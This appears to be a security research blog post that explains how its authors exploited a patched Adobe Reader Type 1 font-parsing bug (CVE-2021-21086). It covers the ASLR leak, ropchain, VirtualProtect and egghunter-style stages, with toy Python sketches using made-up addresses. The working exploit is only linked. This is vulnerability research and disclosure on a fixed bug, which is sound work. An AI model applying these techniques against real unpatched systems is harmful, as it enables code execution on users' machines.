Who needs JS when you’ve got Turing complete fonts?

The road to successfully exploit Adobe Reader using a font

Octavio Gianatiempo
Faraday
Dec 2, 2021


Recently, together with Javier Aguinaga, we gave a talk at Ekoparty 2021 where we showed an exploit for Adobe Reader. The exploit uses a reported bug in the stack machine that parses Type 1 fonts to gain code execution in the context of the rendering process. We made the exploit 100% reliable by taking advantage of this same stack machine, and that is what this post explains. Let’s start by talking a bit about Type 1 fonts.

Font programs & charstrings

Adobe’s Type 1 font format was developed in the ’80s and uses a subset of the PostScript language to define the curves and hints used to rasterize fonts. It was originally a proprietary format, but Adobe released the specification and shared the code with other vendors to promote its adoption. Because of this, Type 1 fonts are natively supported by operating systems such as Mac OS and Windows, as well as by several Adobe products and third-party products that are compatible with Adobe’s formats. The presence of parsers for this format on multiple platforms, combined with the complexity and age of the code, makes it a great target for finding and exploiting bugs.

According to the specification, a font program contains several dictionaries that define various aspects of a font. Each character (glyph) is represented by a charstring: bytecode that is interpreted by a stack machine in order to render it. All the charstrings that compose a font are defined in the CharStrings dictionary.

Organization of a Type 1 font program (Modified from: Adobe Type 1 Font Format, Adobe Systems Inc.)

The stack machine

In Adobe’s products, the stack machine that interprets Type 1 font bytecode is located in CoolType.dll, and it also supports newer versions of this format. This machine has two main components: an operand stack (opstack), which is used to pass arguments to the different operations and receive their results, and a transient array, which acts as random-access memory for storing data. While the operand stack was always part of the specification, the transient array was added in the Type 2 version of the format. Interestingly, the operand stack is implemented as a fixed-size array located on the interpreter function’s own stack, whereas the transient array resides in dynamic memory.

Diagram of the memory while the stack machine executes 4022250974 8 put. The boxes on top represent the transient array, and the boxes below represent the operand stack, which is located in the function’s stack above the return address.

How does this machine work? Let’s take the put operation as an example: it moves a value to a given index of the transient array. The bytecode for this machine uses postfix notation, which means that operands precede the operation. So, if you want to write 0xDEADBEEF at index 8 of the transient array, you have to send 0xDEADBEEF 0x8 put. Numbers have various encodings in this format, but let’s ignore that for simplicity.

The diagram above represents the memory while the machine executes this bytecode. The machine starts by pushing each number to the operand stack, moving the opstack pointer forward. Then it executes the put operation, consuming the arguments from the opstack (which moves the pointer backward) and storing 0xDEADBEEF at index 8 of the transient array.
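To make the postfix evaluation concrete, here is a minimal Python sketch of a machine with an operand stack and a transient array. It is a toy model, not CoolType’s implementation. Numbers are plain Python integers rather than encoded charstring numbers, and only put and get are modeled, following the Type 2 charstring semantics: `val i put` stores a value, and `i get` loads one.

```python
class ToyMachine:
    """Toy stack machine: an operand stack plus a transient array (not CoolType's code)."""

    def __init__(self, transient_size: int = 32):
        self.opstack = []                      # operand stack
        self.transient = [0] * transient_size  # random-access "RAM"

    def run(self, program) -> None:
        for token in program:
            if isinstance(token, int):
                self.opstack.append(token)     # operands are pushed before the operator runs
            elif token == "put":
                index = self.opstack.pop()     # top of stack: destination index
                value = self.opstack.pop()     # below it: value to store
                self.transient[index] = value
            elif token == "get":
                index = self.opstack.pop()
                self.opstack.append(self.transient[index])
            else:
                raise ValueError(f"unsupported operator: {token}")

m = ToyMachine()
m.run([0xDEADBEEF, 0x8, "put"])
print(hex(m.transient[8]))  # 0xdeadbeef
print(m.opstack)            # []: put consumed both operands
```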

Checking the operand stack limits

Most charstring operations check that executing them won’t move the opstack pointer outside the opstack limits. However, they assume that the pointer is inside the opstack to begin with, so they only check one side. For example, a number can only be pushed if the opstack pointer is located before the end of the opstack (i.e., only the upper bound is checked). So if a bug moves the pointer before the beginning of the opstack, numbers can be pushed to memory outside it. In other cases, elements can be written to or read from the transient array only if the opstack pointer is after the beginning of the opstack and enough arguments have been pushed (i.e., only the lower bound is checked). So if a bug moves the pointer past the end of the opstack, values can be copied between the transient array and the memory that lies beyond the opstack. This is especially relevant for exploitation because the return address is located in this direction.
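The one-sided checks can be sketched with a toy model in which the opstack and the rest of the interpreter’s frame share one flat array. The capacity, the distance to the saved return address and the address itself are made-up values. The generic push/pop pair stands in for the real operations. The point is only that a check on one bound says nothing about the other.

```python
OPSTACK_SIZE = 48            # hypothetical opstack capacity, in slots
RET_SLOT = OPSTACK_SIZE + 3  # hypothetical slot holding the saved return address

class OneSidedStack:
    """Flat model of the interpreter frame: opstack slots followed by other frame data."""

    def __init__(self):
        self.mem = [0] * (RET_SLOT + 1)
        self.mem[RET_SLOT] = 0x00401234  # made-up saved return address
        self.sp = 0                      # index of the next free slot

    def push(self, value: int) -> None:
        # Upper bound only: a pointer already below slot 0 would not be caught.
        if self.sp >= OPSTACK_SIZE:
            raise OverflowError("opstack full")
        self.mem[self.sp] = value
        self.sp += 1

    def pop(self) -> int:
        # Lower bound only: a pointer already past the end is not caught.
        if self.sp < 1:
            raise IndexError("not enough operands")
        self.sp -= 1
        return self.mem[self.sp]

s = OneSidedStack()
s.push(7)
print(s.pop())         # 7: normal use
s.sp = RET_SLOT + 1    # simulate a bug that moved the pointer past the opstack
print(hex(s.pop()))    # 0x401234: the lower-bound check passes and the return address leaks
```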

CVE-2021-21086 (patched on February 9, 2021)

Recently, Mateusz Jurczyk (a.k.a. j00ru) of Google Project Zero reported a bug that allows arbitrary stack manipulation. In 2015, this researcher published an in-depth series of posts describing similar older bugs, along with various details of the inner workings of this library. The new bug is in the code for the callOtherSubr operation, which calls subroutines that can be either user-defined or predefined. A subset of the predefined subroutines fails to check the opstack bounds, which allows the opstack pointer to be moved out of the opstack. On February 9, 2021, Adobe released a patch for Adobe Reader that fixes several vulnerabilities, including this CoolType vulnerability (CVE-2021-21086).

Proof of concept

Diagram of the function’s stack while the machine executes j00ru’s POC.

Alongside the bug report, j00ru presented a POC that uses predefined subroutine no. 18 to move the opstack pointer past the opstack limits, toward the return address. This POC illustrates a valid strategy for writing outside the operand stack, but it has a side effect: each time it advances the pointer, it writes 0x120000, which is the internal representation of the number 18 passed to callOtherSubr to select this subroutine. Note that each call to the subroutine advances the pointer by a fixed amount. When the pointer reaches the return address, j00ru’s code overwrites it with 0x41414141. To do this, it uses the get operation, which still works past the end of the opstack because of the one-sided bound checks. When the charstring interpreter function returns, Adobe Reader crashes with EIP = 0x41414141.
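Two small pieces of arithmetic sit behind the POC. First, 0x120000 is exactly 18 × 65536, which is consistent with numbers being held internally as 16.16 fixed-point values. Second, reaching the return address takes a whole number of subroutine calls, because each call advances the pointer by a fixed amount. The step size and distance used in this Python sketch are hypothetical; the real ones depend on the CoolType.dll build.

```python
def to_fixed_16_16(n: int) -> int:
    """Encode an integer as a 32-bit 16.16 fixed-point value (integer part in the high 16 bits)."""
    return (n << 16) & 0xFFFFFFFF

def calls_needed(distance_slots: int, step_slots: int) -> int:
    """Subroutine-18 calls needed to travel at least distance_slots with a fixed step."""
    return -(-distance_slots // step_slots)  # ceiling division for non-negative ints

print(hex(to_fixed_16_16(18)))  # 0x120000
print(calls_needed(20, 3))      # 7 (hypothetical distance and step)
```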

Exploitation

We were surprised that no exploit was available for this bug, considering that the POC grants control of the function’s stack. So we decided to write one ourselves, and in the process we ran into several difficulties that hindered exploitation. However, this stack machine is very powerful, and by abusing it we overcame these difficulties and built a 100% reliable exploit. If you want to take a deep dive into our solutions to these problems, keep on reading. Otherwise, you can skip the following section and check out the code and the video of the working exploit below.

The road to exploitation

Thanks to the POC we knew how to overwrite the return address. So we could have just overwritten it with a ropchain and game over... Well, this is easier said than done because several problems arise when you try to do this:

Defeating ASLR

Diagram of the function’s stack while the machine executes the exploit leaking the return address.

Address space layout randomization (ASLR) is a protection that operating systems implement to make the exploitation of memory corruption bugs harder. It randomizes where executables are loaded into memory and thus changes the addresses of gadgets at runtime. However, the position of each gadget relative to other locations in the same executable remains constant. Consequently, if you manage to leak an address at runtime, you can calculate the actual address of every gadget.
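The rebasing arithmetic fits in a few lines. In this Python sketch every offset is invented for illustration, and it assumes the gadgets live in the same module as the leaked return address. Subtracting the leaked address’s known offset gives the module base chosen by ASLR, and adding each gadget’s offset to that base gives its runtime address.

```python
RET_ADDR_RVA = 0x0004A1B2  # hypothetical offset of the leaked return address in the module

GADGET_RVAS = {            # hypothetical gadget offsets, for illustration only
    "pop_eax_ret": 0x00001234,
    "jmp_esp": 0x00005678,
}

def rebase(leaked_ret: int) -> dict:
    """Turn a leaked return address into runtime gadget addresses."""
    base = leaked_ret - RET_ADDR_RVA  # module base chosen by ASLR
    return {name: base + rva for name, rva in GADGET_RVAS.items()}

gadgets = rebase(0x6C84A1B2)        # made-up leaked value
print(hex(gadgets["pop_eax_ret"]))  # 0x6c801234
```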

This is probably the most interesting part of the exploit. Since the Type 1 interpreter is Turing complete, we used the machine’s own operations to calculate the address of each gadget at runtime. Instead of using get to overwrite the return address as j00ru did in the POC, we used the put operation to save the return address to the transient array. Then we moved the opstack pointer back inside the opstack, performed all the calculations needed to build the ropchain, and saved the result in the transient array. With the ropchain ready, we could move on to the next step: writing it over the return address.
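The same computation can be expressed with the machine’s own operations. The sketch below emits a symbolic token list, not encoded charstring bytes. For each gadget, the tokens load the leaked address with get, add a precomputed delta with add, and store the result with put. The sketch then runs the list on a toy interpreter to check the result. The leak index, deltas and addresses are hypothetical, and the toy ignores the fixed-point representation that the real machine uses for its numbers.

```python
LEAK_SLOT = 0  # hypothetical transient-array index holding the leaked return address

def gadget_program(deltas):
    """Emit tokens computing leak + delta for each gadget, stored at indices 1, 2, ..."""
    program = []
    for dst, delta in enumerate(deltas, start=1):
        program += [LEAK_SLOT, "get", delta, "add", dst, "put"]
    return program

def run(program, transient):
    """Toy interpreter for the three operators used above."""
    stack = []
    for tok in program:
        if isinstance(tok, int):
            stack.append(tok)
        elif tok == "get":
            stack.append(transient[stack.pop()])
        elif tok == "add":
            b, a = stack.pop(), stack.pop()
            stack.append((a + b) & 0xFFFFFFFF)  # wrap like a 32-bit register
        elif tok == "put":
            index, value = stack.pop(), stack.pop()
            transient[index] = value
    return transient

transient = [0] * 8
transient[LEAK_SLOT] = 0x6C84A1B2              # made-up leaked return address
deltas = [0x1234 - 0x4A1B2, 0x5678 - 0x4A1B2]  # gadget offset minus return-address offset
run(gadget_program(deltas), transient)
print([hex(v) for v in transient[1:3]])        # ['0x6c801234', '0x6c805678']
```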

0x120000 side-effect

Diagram of the function’s stack while the machine executes the exploit writing the ropchain.

As mentioned before, each time we use the bug in callOtherSubr to advance the opstack pointer by a fixed amount, the subroutine number gets written to the stack. So if we wrote some gadgets and then advanced the pointer to write more, one of the first gadgets would end up overwritten with 0x120000. This was easy to overcome: just write the ropchain backwards, starting from its last gadget, and you are ready to face the next challenge down the exploitation road. But again, this is easier said than coded in bytecode for the stack machine! So at this point, we stopped writing bytecode and prototyped the rest of the exploit’s strategy in a debugger, just to check whether our goal was achievable.
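A toy model shows why the write order matters. It assumes, purely for illustration, two rules. First, each advance leaves 0x120000 in the slot where the pointer was, then jumps a fixed number of slots. Second, consuming operands moves the pointer back without writing. Under those assumptions, a naive front-to-back writer loses its early gadgets, while a back-to-front writer ends up overwriting every junk value.

```python
JUNK = 0x120000  # value left behind by each pointer advance, per the text
STEP = 3         # hypothetical number of slots covered by one advance

class Frame:
    """Toy frame. The rule that an advance writes JUNK at the current slot is an assumption."""

    def __init__(self, size: int):
        self.mem = [0] * size
        self.p = 0

    def advance(self) -> None:
        self.mem[self.p] = JUNK  # side effect of triggering the bug
        self.p += STEP

    def retreat(self, n: int = 1) -> None:
        self.p -= n              # consuming operands moves back without writing

    def write(self, value: int) -> None:
        self.mem[self.p] = value

def write_forward(chain):
    """Naive order: first gadget first, advancing whenever the pointer is behind."""
    f = Frame(len(chain) + STEP)
    for i, gadget in enumerate(chain):
        while f.p < i:
            f.advance()
        f.retreat(f.p - i)
        f.write(gadget)
    return f.mem[:len(chain)]

def write_backward(chain):
    """Advance past the last slot first, then write from the last gadget down to the first."""
    f = Frame(len(chain) + STEP)
    last = len(chain) - 1
    while f.p < last:
        f.advance()              # JUNK only lands on slots revisited below
    f.retreat(f.p - last)
    for i in range(last, -1, -1):
        f.write(chain[i])
        if i:
            f.retreat()
    return f.mem[:len(chain)]

chain = [0xA, 0xB, 0xC, 0xD, 0xE]
print(write_forward(chain) == chain)   # False: early gadgets were clobbered
print(write_backward(chain) == chain)  # True
```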

Previous function’s local variables

Diagram of the function’s stack while the machine executes the exploit jumping to the shellcode. Note the location of the charstring pointer.

The next problem we faced was that there isn’t much space to write gadgets after the return address. Beyond it lie local variables from the calling function’s stack frame, which the charstring interpreter function uses on its way out. These are probably pointers to objects passed by reference, and the program crashes if they get overwritten.

Our approach, in this case, was to jump from the last gadget to a shellcode that we placed at the end of the charstring interpreter’s stack frame. For this to work, the ropchain calls VirtualProtect to make the stack executable before the jump.
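For reference, this is the shape of a classic 32-bit ret-to-VirtualProtect frame, packed with Python’s struct module. All addresses are made up, and this sketch does not cover how the exploit obtains VirtualProtect’s address. In the real exploit, these dwords are computed and written by the stack machine itself rather than by Python. Because VirtualProtect follows the stdcall convention, it removes its four arguments when it returns. Execution then continues at the return address placed right after it, which here is the now-executable shellcode.

```python
import struct

PAGE_EXECUTE_READWRITE = 0x40  # Windows memory-protection constant

def virtualprotect_frame(virtualprotect: int, shellcode: int, size: int,
                         old_protect_ptr: int) -> bytes:
    """Lay out a 32-bit stdcall call to VirtualProtect that 'returns' into the shellcode."""
    return struct.pack(
        "<6I",
        virtualprotect,          # the previous gadget's 'ret' lands on VirtualProtect
        shellcode,               # VirtualProtect returns here once the region is executable
        shellcode,               # lpAddress: start of the region to change
        size,                    # dwSize
        PAGE_EXECUTE_READWRITE,  # flNewProtect
        old_protect_ptr,         # lpflOldProtect: must point to writable memory
    )

frame = virtualprotect_frame(0x76A01000, 0x0019F200, 0x200, 0x0019E000)  # made-up addresses
print(len(frame))  # 24
```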

Limited space for shellcode

It turned out that the space in the charstring interpreter’s stack frame is also limited, because there are local variables that, once again, make the program crash if they get overwritten. Luckily, among these local variables there is a pointer to the charstring buffer (shown in the previous diagram), and this buffer can hold 63 KB. So we used an egghunter-like approach: we added 0xDEADBEEF (our egg) at the end of the bytecode and then appended the last stage of the exploit. By searching memory for the egg, the shellcode can jump to this last stage regardless of the charstring length. In our case, the last stage pops a calc, but it can be modified to do anything because the available space is no longer a problem.
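The search itself is simple. This Python sketch plays the role of the egghunter over a byte buffer. It assumes the egg is matched as a little-endian dword, so its bytes are EF BE AD DE, and that it appears only once, right before the last stage. In the exploit, the search runs as shellcode, presumably starting from the charstring pointer found in the interpreter’s frame.

```python
import struct

EGG = struct.pack("<I", 0xDEADBEEF)  # b'\xef\xbe\xad\xde' in little-endian memory

def find_payload(buffer: bytes) -> int:
    """Return the offset right after the egg, where the last stage begins (-1 if absent)."""
    pos = buffer.find(EGG)
    return -1 if pos < 0 else pos + len(EGG)

charstring = b"\x8b\x8c" * 10 + EGG + b"\x90\x90\xcc"  # made-up bytecode + egg + stage
off = find_payload(charstring)
print(off, charstring[off:])  # 24 b'\x90\x90\xcc'
```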

Charstring content for the egghunter-like approach.

Charstring complexity

At this point, we had developed strategies to solve all the challenges that arose, which technically allowed us to inject and execute any shellcode in the context of the reader’s rendering process. But one last challenge remained unsolved: how to chain all these solutions into a single charstring. Remember that, for this exploit to work, everything has to be coded in bytecode for the stack machine that parses the fonts, and doing this by hand is very hard.

To solve this, we replicated the behavior of the stack machine in Python, which allowed us to predict the effects that executing any charstring has on the stack. Moreover, we used this replica to automate bytecode generation by adding operations to the charstring until certain conditions were met. For example, we used it to move the operand stack pointer until it reached the desired position.
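Here is a minimal sketch of that idea, assuming a simplified replica that only tracks the pointer. The helper keeps emitting operations until the simulated pointer lands exactly on the target. `Replica` and `ADVANCE` are hypothetical names: `ADVANCE` is a placeholder for one trigger of the callOtherSubr bug, with an assumed fixed step. `drop` is the Type 2 operator that discards one operand; the sketch assumes it works past the end of the opstack because only its lower bound is checked.

```python
class Replica:
    """Hypothetical, heavily simplified mirror of the interpreter's pointer state."""

    def __init__(self, start: int, step: int):
        self.sp = start    # simulated opstack pointer, in slots
        self.step = step   # assumed fixed advance per trigger of the callOtherSubr bug
        self.program = []  # emitted operations (symbolic, not encoded bytes)

    def emit(self, op: str, delta: int) -> None:
        self.program.append(op)
        self.sp += delta

def move_pointer_to(rep: Replica, target: int) -> list:
    """Keep emitting operations until the simulated pointer sits exactly on target."""
    while rep.sp < target:
        rep.emit("ADVANCE", rep.step)  # placeholder for one subroutine-18 trigger
    while rep.sp > target:
        rep.emit("drop", -1)           # Type 2 'drop' discards one operand
    return rep.program

rep = Replica(start=0, step=4)
print(move_pointer_to(rep, 10))  # ['ADVANCE', 'ADVANCE', 'ADVANCE', 'drop', 'drop']
```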

More remarkably, this replica of the stack machine allowed us to encapsulate primitives. For example, we built one that copies four dwords from the transient array to any position on the stack.
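Building on the same idea, a primitive can be wrapped as a Python function that emits operations and updates the simulated state. In this hypothetical sketch, `Replica`, `ADVANCE` and `STORE` are illustrative names, not the exploit’s actual code. The sketch assumes a `STORE` step that copies a transient-array entry into the slot just below the pointer. Writing the last dword first follows the same backwards strategy used for the ropchain.

```python
class Replica:
    """Hypothetical simplified replica: tracks the pointer and what lands in each stack slot."""

    def __init__(self, step: int):
        self.sp = 0        # simulated opstack pointer, in slots
        self.step = step   # assumed fixed advance per trigger of the callOtherSubr bug
        self.program = []  # emitted symbolic operations
        self.slots = {}    # slot -> description of the value written there

    def emit(self, op: str, delta: int = 0) -> None:
        self.program.append(op)
        self.sp += delta

    def move_to(self, target: int) -> None:
        while self.sp < target:
            self.emit("ADVANCE", self.step)  # placeholder for one subroutine-18 trigger
        while self.sp > target:
            self.emit("drop", -1)

    def store_from_transient(self, index: int) -> None:
        # Placeholder primitive: copy transient[index] into the slot just below the pointer.
        self.emit(f"STORE t[{index}]")
        self.slots[self.sp - 1] = f"t[{index}]"

def copy_four_dwords(rep: Replica, src_index: int, dst_slot: int) -> None:
    """Copy transient[src_index..src_index+3] to slots dst_slot..dst_slot+3, last dword first."""
    for k in range(3, -1, -1):
        rep.move_to(dst_slot + k + 1)
        rep.store_from_transient(src_index + k)

rep = Replica(step=4)
copy_four_dwords(rep, src_index=0, dst_slot=10)
print(rep.slots)  # {13: 't[3]', 12: 't[2]', 11: 't[1]', 10: 't[0]'}
```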

Working exploit code and video

Exploit code can be found in this repo, and a video of the exploit in action was published alongside this post. Note that Adobe Reader opens files in a sandboxed renderer process, and code execution is achieved in the context of this process. For demonstration purposes, we disabled this protection.


